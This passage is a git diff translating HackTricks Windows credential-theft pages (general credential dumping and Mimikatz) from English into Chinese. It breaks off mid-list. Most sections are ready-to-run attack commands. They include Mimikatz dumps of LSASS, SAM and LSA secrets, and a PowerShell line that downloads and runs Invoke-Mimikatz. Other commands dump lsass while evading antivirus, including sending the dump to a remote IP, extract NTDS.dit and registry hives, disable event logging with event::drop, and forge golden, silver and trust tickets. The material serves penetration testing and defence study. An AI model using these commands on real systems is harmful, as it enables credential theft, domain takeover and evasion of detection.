 mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
 ```
-
-**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
+**查找 Mimikatz 可以做的其他事情，请访问** [**此页面**](credentials-mimikatz.md)**。**
 
 ### Invoke-Mimikatz
-
 ```bash
 IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
 Invoke-Mimikatz -DumpCreds #Dump creds from memory
 Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
 ```
+[**在这里了解一些可能的凭据保护措施。**](credentials-protections.md) **这些保护措施可以防止 Mimikatz 提取某些凭据。**
 
-[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
-
-## Credentials with Meterpreter
-
-Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
+## 使用 Meterpreter 的凭据
 
+使用我创建的 [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **来** **搜索受害者内部的密码和哈希。**
 ```bash
 #Credentials from SAM
 post/windows/gather/smart_hashdump
@@ -50,14 +45,12 @@ mimikatz_command -f "sekurlsa::logonpasswords"
 mimikatz_command -f "lsadump::lsa /inject"
 mimikatz_command -f "lsadump::sam"
 ```
-
-## Bypassing AV
+## 绕过 AV
 
 ### Procdump + Mimikatz
 
-As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\
-You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
-
+由于 **Procdump 来自** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**是一个合法的 Microsoft 工具**，它不会被 Defender 检测到。\
+您可以使用此工具 **转储 lsass 进程**，**下载转储**并 **从转储中提取** **凭据**。
 ```bash:Dump lsass
 #Local
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
@@ -72,118 +65,96 @@ mimikatz # sekurlsa::minidump lsass.dmp
 //Extract credentials
 mimikatz # sekurlsa::logonPasswords
 ```
+此过程是通过 [SprayKatz](https://github.com/aas-n/spraykatz) 自动完成的： `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
 
-This process is done automatically with [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
+**注意**：某些 **AV** 可能会将 **procdump.exe 用于转储 lsass.exe** 视为 **恶意**，这是因为它们正在 **检测** 字符串 **"procdump.exe" 和 "lsass.exe"**。因此，将 **lsass.exe 的 PID** 作为参数传递给 procdump **而不是** **lsass.exe 的名称** 更加 **隐蔽**。
 
-**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
+### 使用 **comsvcs.dll** 转储 lsass
 
-### Dumping lsass with **comsvcs.dll**
-
-A DLL named **comsvcs.dll** found in `C:\Windows\System32` is responsible for **dumping process memory** in the event of a crash. This DLL includes a **function** named **`MiniDumpW`**, designed to be invoked using `rundll32.exe`.\
-It is irrelevant to use the first two arguments, but the third one is divided into three components. The process ID to be dumped constitutes the first component, the dump file location represents the second, and the third component is strictly the word **full**. No alternative options exist.\
-Upon parsing these three components, the DLL is engaged in creating the dump file and transferring the specified process's memory into this file.\
-Utilization of the **comsvcs.dll** is feasible for dumping the lsass process, thereby eliminating the need to upload and execute procdump. This method is described in detail at [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords).
-
-The following command is employed for execution:
+在 `C:\Windows\System32` 中找到的名为 **comsvcs.dll** 的 DLL 负责在崩溃事件中 **转储进程内存**。该 DLL 包含一个名为 **`MiniDumpW`** 的 **函数**，旨在通过 `rundll32.exe` 调用。\
+使用前两个参数是无关紧要的，但第三个参数分为三个部分。要转储的进程 ID 是第一部分，转储文件位置是第二部分，第三部分严格是单词 **full**。没有其他选项。\
+解析这三个部分后，DLL 开始创建转储文件并将指定进程的内存转移到该文件中。\
+利用 **comsvcs.dll** 可以转储 lsass 进程，从而无需上传和执行 procdump。此方法的详细信息可在 [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords) 中找到。
 
+执行的命令如下：
 ```bash
 rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
 ```
+**您可以使用** [**lssasy**](https://github.com/Hackndo/lsassy)**自动化此过程。**
 
-**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
+### **使用任务管理器转储 lsass**
 
-### **Dumping lsass with Task Manager**
+1. 右键单击任务栏，然后单击任务管理器
+2. 单击更多详细信息
+3. 在进程选项卡中搜索“本地安全授权进程”
+4. 右键单击“本地安全授权进程”，然后单击“创建转储文件”。
 
-1. Right click on the Task Bar and click on Task Manager
-2. Click on More details
-3. Search for "Local Security Authority Process" process in the Processes tab
-4. Right click on "Local Security Authority Process" process and click on "Create dump file".
-
-### Dumping lsass with procdump
-
-[Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) is a Microsoft signed binary which is a part of [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) suite.
+### 使用 procdump 转储 lsass
 
+[Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) 是一个微软签名的二进制文件，是 [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) 套件的一部分。
 ```
 Get-Process -Name LSASS
 .\procdump.exe -ma 608 lsass.dmp
 ```
-
 ## Dumpin lsass with PPLBlade
 
-[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) is a Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.
+[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) 是一个受保护进程转储工具，支持对内存转储进行混淆，并在不将其写入磁盘的情况下将其传输到远程工作站。
 
-**Key functionalities**:
-
-1. Bypassing PPL protection
-2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
-3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)
+**主要功能**：
 
+1. 绕过 PPL 保护
+2. 混淆内存转储文件以规避 Defender 基于签名的检测机制
+3. 使用 RAW 和 SMB 上传方法上传内存转储，而不将其写入磁盘（无文件转储）
 ```bash
 PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
 ```
-
 ## CrackMapExec
 
-### Dump SAM hashes
-
+### 转储 SAM 哈希
 ```
 cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
 ```
-
-### Dump LSA secrets
-
+### 转储 LSA 秘密
 ```
 cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
 ```
-
-### Dump the NTDS.dit from target DC
-
+### 从目标 DC 转储 NTDS.dit
 ```
 cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
 #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
 ```
-
-### Dump the NTDS.dit password history from target DC
-
+### 从目标 DC 转储 NTDS.dit 密码历史记录
 ```
 #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
 ```
-
-### Show the pwdLastSet attribute for each NTDS.dit account
-
+### 显示每个 NTDS.dit 账户的 pwdLastSet 属性
 ```
 #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
 ```
-
 ## Stealing SAM & SYSTEM
 
-This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
+这些文件应该**位于**_C:\windows\system32\config\SAM_和_C:\windows\system32\config\SYSTEM._ 但是**你不能以常规方式复制它们**，因为它们受到保护。
 
 ### From Registry
 
-The easiest way to steal those files is to get a copy from the registry:
-
+窃取这些文件的最简单方法是从注册表获取副本：
 ```
 reg save HKLM\sam sam
 reg save HKLM\system system
 reg save HKLM\security security
 ```
-
-**Download** those files to your Kali machine and **extract the hashes** using:
-
+**下载**这些文件到你的Kali机器并使用**提取哈希**：
 ```
 samdump2 SYSTEM SAM
 impacket-secretsdump -sam sam -security security -system system LOCAL
 ```
+### 卷影复制
 
-### Volume Shadow Copy
+您可以使用此服务复制受保护的文件。您需要是管理员。
 
-You can perform copy of protected files using this service. You need to be Administrator.
-
-#### Using vssadmin
-
-vssadmin binary is only available in Windows Server versions
+#### 使用 vssadmin
 
+vssadmin 二进制文件仅在 Windows Server 版本中可用。
 ```bash
 vssadmin create shadow /for=C:
 #Copy SAM
@@ -196,9 +167,7 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Ex
 # You can also create a symlink to the shadow copy and access it
 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
 ```
-
-But you can do the same from **Powershell**. This is an example of **how to copy the SAM file** (the hard drive used is "C:" and its saved to C:\users\Public) but you can use this for copying any protected file:
-
+但是你也可以通过 **Powershell** 来做到这一点。这是 **如何复制 SAM 文件** 的一个示例（使用的硬盘是 "C:"，并保存到 C:\users\Public），但你可以用它来复制任何受保护的文件：
 ```bash
 $service=(Get-Service -name VSS)
 if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
@@ -207,119 +176,99 @@ $volume=(gwmi win32_shadowcopy -filter "ID='$id'")
 cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
 $voume.Delete();if($notrunning -eq 1){$service.Stop()}
 ```
-
-Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
-
 ### Invoke-NinjaCopy
 
-Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
-
+最后，您还可以使用 [**PS 脚本 Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) 来复制 SAM、SYSTEM 和 ntds.dit。
 ```bash
 Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
 ```
+## **Active Directory 凭据 - NTDS.dit**
 
-## **Active Directory Credentials - NTDS.dit**
+**NTDS.dit** 文件被称为 **Active Directory** 的核心，保存有关用户对象、组及其成员资格的重要数据。它是域用户的 **密码哈希** 存储位置。该文件是一个 **可扩展存储引擎 (ESE)** 数据库，位于 **_%SystemRoom%/NTDS/ntds.dit_**。
 
-The **NTDS.dit** file is known as the heart of **Active Directory**, holding crucial data about user objects, groups, and their memberships. It's where the **password hashes** for domain users are stored. This file is an **Extensible Storage Engine (ESE)** database and resides at **_%SystemRoom%/NTDS/ntds.dit_**.
+在这个数据库中，维护着三个主要表：
 
-Within this database, three primary tables are maintained:
+- **数据表**：该表负责存储有关用户和组等对象的详细信息。
+- **链接表**：它跟踪关系，例如组成员资格。
+- **SD 表**：每个对象的 **安全描述符** 存储在这里，确保存储对象的安全性和访问控制。
 
-- **Data Table**: This table is tasked with storing details about objects like users and groups.
-- **Link Table**: It keeps track of relationships, such as group memberships.
-- **SD Table**: **Security descriptors** for each object are held here, ensuring the security and access control for the stored objects.
+更多信息请参见：[http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
 
-More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
+Windows 使用 _Ntdsa.dll_ 与该文件交互，并由 _lsass.exe_ 使用。然后，**NTDS.dit** 文件的一部分可能位于 **`lsass`** 内存中（您可以找到最近访问的数据，可能是由于使用 **缓存** 提高了性能）。
 
-Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the `lsass`** memory (you can find the latest accessed data probably because of the performance improve by using a **cache**).
+#### 解密 NTDS.dit 内的哈希
 
-#### Decrypting the hashes inside NTDS.dit
+哈希被加密三次：
 
-The hash is cyphered 3 times:
+1. 使用 **BOOTKEY** 和 **RC4** 解密密码加密密钥 (**PEK**)。
+2. 使用 **PEK** 和 **RC4** 解密 **哈希**。
+3. 使用 **DES** 解密 **哈希**。
 
-1. Decrypt Password Encryption Key (**PEK**) using the **BOOTKEY** and **RC4**.
-2. Decrypt tha **hash** using **PEK** and **RC4**.
-3. Decrypt the **hash** using **DES**.
+**PEK** 在 **每个域控制器** 中具有 **相同的值**，但它在 **NTDS.dit** 文件中使用 **域控制器的 SYSTEM 文件的 BOOTKEY** 进行 **加密**（在不同的域控制器之间是不同的）。这就是为什么要从 NTDS.dit 文件中获取凭据 **您需要 NTDS.dit 和 SYSTEM 文件** (_C:\Windows\System32\config\SYSTEM_)。
 
-**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
-
-### Copying NTDS.dit using Ntdsutil
-
-Available since Windows Server 2008.
+### 使用 Ntdsutil 复制 NTDS.dit
 
+自 Windows Server 2008 起可用。
 ```bash
 ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
 ```
+您还可以使用 [**卷影副本**](./#stealing-sam-and-system) 技巧来复制 **ntds.dit** 文件。请记住，您还需要 **SYSTEM 文件** 的副本（同样，您可以 [**从注册表转储或使用卷影副本**](./#stealing-sam-and-system) 技巧）。
 
-You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
-
-### **Extracting hashes from NTDS.dit**
-
-Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
+### **从 NTDS.dit 中提取哈希**
 
+一旦您 **获得** 了 **NTDS.dit** 和 **SYSTEM** 文件，您可以使用像 _secretsdump.py_ 这样的工具来 **提取哈希**：
 ```bash
 secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
 ```
-
-You can also **extract them automatically** using a valid domain admin user:
-
+您还可以使用有效的域管理员用户**自动提取它们**：
 ```
 secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
 ```
+对于 **大 NTDS.dit 文件**，建议使用 [gosecretsdump](https://github.com/c-sto/gosecretsdump) 进行提取。
 
-For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump).
+最后，您还可以使用 **metasploit 模块**：_post/windows/gather/credentials/domain_hashdump_ 或 **mimikatz** `lsadump::lsa /inject`
 
-Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain_hashdump_ or **mimikatz** `lsadump::lsa /inject`
-
-### **Extracting domain objects from NTDS.dit to an SQLite database**
-
-NTDS objects can be extracted to an SQLite database with [ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite). Not only secrets are extracted but also the entire objects and their attributes for further information extraction when the raw NTDS.dit file is already retrieved.
+### **从 NTDS.dit 提取域对象到 SQLite 数据库**
 
+NTDS 对象可以使用 [ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite) 提取到 SQLite 数据库中。不仅提取了秘密，还提取了整个对象及其属性，以便在原始 NTDS.dit 文件已被检索时进行进一步的信息提取。
 ```
 ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
 ```
-
-The `SYSTEM` hive is optional but allow for secrets decryption (NT & LM hashes, supplemental credentials such as cleartext passwords, kerberos or trust keys, NT & LM password histories). Along with other information, the following data is extracted : user and machine accounts with their hashes, UAC flags, timestamp for last logon and password change, accounts description, names, UPN, SPN, groups and recursive memberships, organizational units tree and membership, trusted domains with trusts type, direction and attributes...
+`SYSTEM` hive 是可选的，但允许解密秘密（NT 和 LM 哈希、补充凭据，如明文密码、kerberos 或信任密钥、NT 和 LM 密码历史）。除了其他信息外，提取的数据包括：用户和机器账户及其哈希、UAC 标志、最后登录和密码更改的时间戳、账户描述、名称、UPN、SPN、组和递归成员资格、组织单位树和成员资格、受信任的域及其信任类型、方向和属性...
 
 ## Lazagne
 
-Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
-
+从 [这里](https://github.com/AlessandroZ/LaZagne/releases) 下载二进制文件。您可以使用此二进制文件从多个软件中提取凭据。
 ```
 lazagne.exe all
 ```
+## 从SAM和LSASS提取凭据的其他工具
 
-## Other tools for extracting credentials from SAM and LSASS
+### Windows凭据编辑器（WCE）
 
-### Windows credentials Editor (WCE)
-
-This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
+此工具可用于从内存中提取凭据。下载地址：[http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
 
 ### fgdump
 
-Extract credentials from the SAM file
-
+从SAM文件中提取凭据
 ```
 You can find this binary inside Kali, just do: locate fgdump.exe
 fgdump.exe
 ```
-
 ### PwDump
 
-Extract credentials from the SAM file
-
+从SAM文件中提取凭据
 ```
 You can find this binary inside Kali, just do: locate pwdump.exe
 PwDump.exe -o outpwdump -x 127.0.0.1
 type outpwdump
 ```
-
 ### PwDump7
 
-Download it from:[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.org/security/pwdump_7) and just **execute it** and the passwords will be extracted.
+从：[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.org/security/pwdump_7) 下载并**执行它**，密码将被提取。
 
-## Defenses
+## 防御
 
-[**Learn about some credentials protections here.**](credentials-protections.md)
+[**在这里了解一些凭据保护。**](credentials-protections.md)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
index 9b30e2307..328fe07c5 100644
--- a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
+++ b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
@@ -4,220 +4,209 @@
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
-**This page is based on one from [adsecurity.org](https://adsecurity.org/?page_id=1821)**. Check the original for further info!
+**本页面基于[adsecurity.org](https://adsecurity.org/?page_id=1821)上的内容**。查看原文以获取更多信息！
 
-## LM and Clear-Text in memory
+## 内存中的LM和明文
 
-From Windows 8.1 and Windows Server 2012 R2 onwards, significant measures have been implemented to safeguard against credential theft:
+从Windows 8.1和Windows Server 2012 R2开始，实施了重要措施以防止凭据盗窃：
 
-- **LM hashes and plain-text passwords** are no longer stored in memory to enhance security. A specific registry setting, _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_ must be configured with a DWORD value of `0` to disable Digest Authentication, ensuring "clear-text" passwords are not cached in LSASS.
+- **LM哈希和明文密码**不再存储在内存中以增强安全性。必须将特定注册表设置_HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_配置为DWORD值`0`以禁用摘要身份验证，确保“明文”密码不在LSASS中缓存。
 
-- **LSA Protection** is introduced to shield the Local Security Authority (LSA) process from unauthorized memory reading and code injection. This is achieved by marking the LSASS as a protected process. Activation of LSA Protection involves:
-  1. Modifying the registry at _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ by setting `RunAsPPL` to `dword:00000001`.
-  2. Implementing a Group Policy Object (GPO) that enforces this registry change across managed devices.
+- **LSA保护**被引入以保护本地安全机构（LSA）进程免受未经授权的内存读取和代码注入。这是通过将LSASS标记为受保护进程来实现的。激活LSA保护涉及：
+1. 在_HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_中修改注册表，将`RunAsPPL`设置为`dword:00000001`。
+2. 实施一个强制此注册表更改的组策略对象（GPO），以便在受管理设备上生效。
 
-Despite these protections, tools like Mimikatz can circumvent LSA Protection using specific drivers, although such actions are likely to be recorded in event logs.
+尽管有这些保护措施，像Mimikatz这样的工具仍然可以使用特定驱动程序绕过LSA保护，尽管此类行为可能会被记录在事件日志中。
 
-### Counteracting SeDebugPrivilege Removal
-
-Administrators typically have SeDebugPrivilege, enabling them to debug programs. This privilege can be restricted to prevent unauthorized memory dumps, a common technique used by attackers to extract credentials from memory. However, even with this privilege removed, the TrustedInstaller account can still perform memory dumps using a customized service configuration:
+### 反制SeDebugPrivilege移除
 
+管理员通常拥有SeDebugPrivilege，使他们能够调试程序。可以限制此权限以防止未经授权的内存转储，这是攻击者提取内存中凭据的常用技术。然而，即使移除了此权限，TrustedInstaller帐户仍然可以使用自定义服务配置执行内存转储：
 ```bash
 sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
 sc start TrustedInstaller
 ```
-
-This allows the dumping of the `lsass.exe` memory to a file, which can then be analyzed on another system to extract credentials:
-
+这允许将 `lsass.exe` 的内存转储到文件中，然后可以在另一个系统上进行分析以提取凭据：
 ```
 # privilege::debug
 # sekurlsa::minidump lsass.dmp
 # sekurlsa::logonpasswords
 ```
+## Mimikatz 选项
 
-## Mimikatz Options
+在 Mimikatz 中，事件日志篡改涉及两个主要操作：清除事件日志和修补事件服务以防止记录新事件。以下是执行这些操作的命令：
 
-Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions:
+#### 清除事件日志
 
-#### Clearing Event Logs
+- **命令**：此操作旨在删除事件日志，使追踪恶意活动变得更加困难。
+- Mimikatz 在其标准文档中没有提供直接通过命令行清除事件日志的命令。然而，事件日志操作通常涉及使用系统工具或脚本在 Mimikatz 之外清除特定日志（例如，使用 PowerShell 或 Windows 事件查看器）。
 
-- **Command**: This action is aimed at deleting the event logs, making it harder to track malicious activities.
-- Mimikatz does not provide a direct command in its standard documentation for clearing event logs directly via its command line. However, event log manipulation typically involves using system tools or scripts outside of Mimikatz to clear specific logs (e.g., using PowerShell or Windows Event Viewer).
+#### 实验性功能：修补事件服务
 
-#### Experimental Feature: Patching the Event Service
+- **命令**：`event::drop`
+- 此实验性命令旨在修改事件日志服务的行为，有效防止其记录新事件。
+- 示例：`mimikatz "privilege::debug" "event::drop" exit`
 
-- **Command**: `event::drop`
-- This experimental command is designed to modify the Event Logging Service's behavior, effectively preventing it from recording new events.
-- Example: `mimikatz "privilege::debug" "event::drop" exit`
+- `privilege::debug` 命令确保 Mimikatz 以必要的权限操作，以修改系统服务。
+- 然后，`event::drop` 命令修补事件日志服务。
 
-- The `privilege::debug` command ensures that Mimikatz operates with the necessary privileges to modify system services.
-- The `event::drop` command then patches the Event Logging service.
+### Kerberos 票证攻击
 
-### Kerberos Ticket Attacks
+### 黄金票证创建
 
-### Golden Ticket Creation
+黄金票证允许进行域范围的访问冒充。关键命令和参数：
 
-A Golden Ticket allows for domain-wide access impersonation. Key command and parameters:
-
-- Command: `kerberos::golden`
-- Parameters:
-  - `/domain`: The domain name.
-  - `/sid`: The domain's Security Identifier (SID).
-  - `/user`: The username to impersonate.
-  - `/krbtgt`: The NTLM hash of the domain's KDC service account.
-  - `/ptt`: Directly injects the ticket into memory.
-  - `/ticket`: Saves the ticket for later use.
-
-Example:
+- 命令：`kerberos::golden`
+- 参数：
+- `/domain`：域名。
+- `/sid`：域的安全标识符（SID）。
+- `/user`：要冒充的用户名。
+- `/krbtgt`：域的 KDC 服务账户的 NTLM 哈希。
+- `/ptt`：直接将票证注入内存。
+- `/ticket`：保存票证以供后用。
 
+示例：
 ```bash
 mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
 ```
+### Silver Ticket 创建
 
-### Silver Ticket Creation
+Silver Tickets 授予对特定服务的访问权限。关键命令和参数：
 
-Silver Tickets grant access to specific services. Key command and parameters:
-
-- Command: Similar to Golden Ticket but targets specific services.
-- Parameters:
-  - `/service`: The service to target (e.g., cifs, http).
-  - Other parameters similar to Golden Ticket.
-
-Example:
+- 命令：类似于 Golden Ticket，但针对特定服务。
+- 参数：
+- `/service`：要针对的服务（例如，cifs，http）。
+- 其他参数类似于 Golden Ticket。
 
+示例：
 ```bash
 mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
 ```
+### 信任票据创建
 
-### Trust Ticket Creation
+信任票据用于通过利用信任关系访问跨域资源。关键命令和参数：
 
-Trust Tickets are used for accessing resources across domains by leveraging trust relationships. Key command and parameters:
-
-- Command: Similar to Golden Ticket but for trust relationships.
-- Parameters:
-  - `/target`: The target domain's FQDN.
-  - `/rc4`: The NTLM hash for the trust account.
-
-Example:
+- 命令：类似于黄金票据，但用于信任关系。
+- 参数：
+- `/target`：目标域的 FQDN。
+- `/rc4`：信任账户的 NTLM 哈希。
 
+示例：
 ```bash
 mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
 ```
+### 额外的 Kerberos 命令
 
-### Additional Kerberos Commands
+- **列出票证**：
 
-- **Listing Tickets**:
+- 命令：`kerberos::list`
+- 列出当前用户会话的所有 Kerberos 票证。
 
-  - Command: `kerberos::list`
-  - Lists all Kerberos tickets for the current user session.
+- **传递缓存**：
 
-- **Pass the Cache**:
+- 命令：`kerberos::ptc`
+- 从缓存文件中注入 Kerberos 票证。
+- 示例：`mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
 
-  - Command: `kerberos::ptc`
-  - Injects Kerberos tickets from cache files.
-  - Example: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
+- **传递票证**：
 
-- **Pass the Ticket**:
+- 命令：`kerberos::ptt`
+- 允许在另一个会话中使用 Kerberos 票证。
+- 示例：`mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
 
-  - Command: `kerberos::ptt`
-  - Allows using a Kerberos ticket in another session.
-  - Example: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
+- **清除票证**：
+- 命令：`kerberos::purge`
+- 清除会话中的所有 Kerberos 票证。
+- 在使用票证操作命令之前很有用，以避免冲突。
 
-- **Purge Tickets**:
-  - Command: `kerberos::purge`
-  - Clears all Kerberos tickets from the session.
-  - Useful before using ticket manipulation commands to avoid conflicts.
+### Active Directory 篡改
 
-### Active Directory Tampering
+- **DCShadow**：临时使机器充当 DC 以进行 AD 对象操作。
 
-- **DCShadow**: Temporarily make a machine act as a DC for AD object manipulation.
+- `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
 
-  - `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
+- **DCSync**：模拟 DC 请求密码数据。
+- `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
 
-- **DCSync**: Mimic a DC to request password data.
-  - `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
+### 凭证访问
 
-### Credential Access
+- **LSADUMP::LSA**：从 LSA 中提取凭证。
 
-- **LSADUMP::LSA**: Extract credentials from LSA.
+- `mimikatz "lsadump::lsa /inject" exit`
 
-  - `mimikatz "lsadump::lsa /inject" exit`
+- **LSADUMP::NetSync**：使用计算机帐户的密码数据模拟 DC。
 
-- **LSADUMP::NetSync**: Impersonate a DC using a computer account's password data.
+- _原始上下文中未提供 NetSync 的具体命令。_
 
-  - _No specific command provided for NetSync in original context._
+- **LSADUMP::SAM**：访问本地 SAM 数据库。
 
-- **LSADUMP::SAM**: Access local SAM database.
+- `mimikatz "lsadump::sam" exit`
 
-  - `mimikatz "lsadump::sam" exit`
+- **LSADUMP::Secrets**：解密存储在注册表中的秘密。
 
-- **LSADUMP::Secrets**: Decrypt secrets stored in the registry.
+- `mimikatz "lsadump::secrets" exit`
 
-  - `mimikatz "lsadump::secrets" exit`
+- **LSADUMP::SetNTLM**：为用户设置新的 NTLM 哈希。
 
-- **LSADUMP::SetNTLM**: Set a new NTLM hash for a user.
